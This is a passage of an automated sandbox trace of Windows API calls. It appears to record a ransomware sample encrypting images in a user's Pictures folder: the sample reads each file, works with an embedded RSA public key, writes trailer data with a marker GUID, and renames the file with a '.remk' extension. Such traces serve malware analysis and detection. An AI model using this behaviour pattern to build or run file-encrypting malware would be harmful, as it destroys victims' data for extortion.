dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc8e8 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc888 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc888 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8a0 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8e8 | out: hHeap=0x630000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.725] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.726] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc888 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8d0 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.726] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cee68 | out: hHeap=0x630000) returned 1 [0236.727] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.727] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x141f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.727] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.727] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.727] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.728] CloseHandle (hObject=0x640) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf0) returned 0x65dd10 [0236.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0236.730] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\M3CaFNSYagYb6MmIK-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\m3cafnsyagyb6mmik-.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\M3CaFNSYagYb6MmIK-.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\m3cafnsyagyb6mmik-.bmp.remk")) returned 1 [0236.732] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc094c120, ftCreationTime.dwHighDateTime=0x1d5daf3, ftLastAccessTime.dwLowDateTime=0xcbd586b0, ftLastAccessTime.dwHighDateTime=0x1d5d9ee, ftLastWriteTime.dwLowDateTime=0xcbd586b0, ftLastWriteTime.dwHighDateTime=0x1d5d9ee, nFileSizeHigh=0x0, nFileSizeLow=0x1641e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PSEVjAP5aE JA4lRFb.png", cAlternateFileName="PSEVJA~1.PNG")) returned 1 [0236.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.733] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\PSEVjAP5aE JA4lRFb.png") returned=".png" [0236.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\PSEVjAP5aE JA4lRFb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\psevjap5ae ja4lrfb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.734] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=91166) returned 1 [0236.734] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.737] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x163f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.737] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.739] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1641e, lpOverlapped=0x0) returned 1 [0236.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.740] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.741] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.741] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.741] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.741] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.741] GetLastError () returned 0x0 [0236.741] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.741] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.741] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.741] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.741] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.742] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.743] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1641e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.743] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.743] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.743] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.743] CloseHandle (hObject=0x640) returned 1 [0236.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf0) returned 0x65dd10 [0236.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0236.746] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\PSEVjAP5aE JA4lRFb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\psevjap5ae ja4lrfb.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\PSEVjAP5aE JA4lRFb.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\psevjap5ae ja4lrfb.png.remk")) returned 1 [0236.748] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64122d60, ftCreationTime.dwHighDateTime=0x1d5dae0, ftLastAccessTime.dwLowDateTime=0xfd444950, ftLastAccessTime.dwHighDateTime=0x1d5ddce, ftLastWriteTime.dwLowDateTime=0xfd444950, ftLastWriteTime.dwHighDateTime=0x1d5ddce, nFileSizeHigh=0x0, nFileSizeLow=0x4f85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rtW3JtBFakvqy.png", cAlternateFileName="RTW3JT~1.PNG")) returned 1 [0236.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.748] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\rtW3JtBFakvqy.png") returned=".png" [0236.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\rtW3JtBFakvqy.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\rtw3jtbfakvqy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.749] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=20357) returned 1 [0236.749] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.752] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x4f5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.752] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.754] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x4f85, lpOverlapped=0x0) returned 1 [0236.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.755] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.755] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.756] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.756] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.756] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.756] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.756] GetLastError () returned 0x0 [0236.756] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.756] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.756] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.756] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.756] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.756] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.757] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x4f85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.757] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.758] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.758] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.758] CloseHandle (hObject=0x640) returned 1 [0236.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x6a2d00 [0236.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0236.767] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\rtW3JtBFakvqy.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\rtw3jtbfakvqy.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\rtW3JtBFakvqy.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\rtw3jtbfakvqy.png.remk")) returned 1 [0236.769] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64122d60, ftCreationTime.dwHighDateTime=0x1d5dae0, ftLastAccessTime.dwLowDateTime=0xfd444950, ftLastAccessTime.dwHighDateTime=0x1d5ddce, ftLastWriteTime.dwLowDateTime=0xfd444950, ftLastWriteTime.dwHighDateTime=0x1d5ddce, nFileSizeHigh=0x0, nFileSizeLow=0x4f85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rtW3JtBFakvqy.png", cAlternateFileName="RTW3JT~1.PNG")) returned 0 [0236.769] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0236.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0236.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0236.769] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0236.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0236.769] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0236.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0236.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0236.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0236.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65eb58 | out: hHeap=0x630000) returned 1 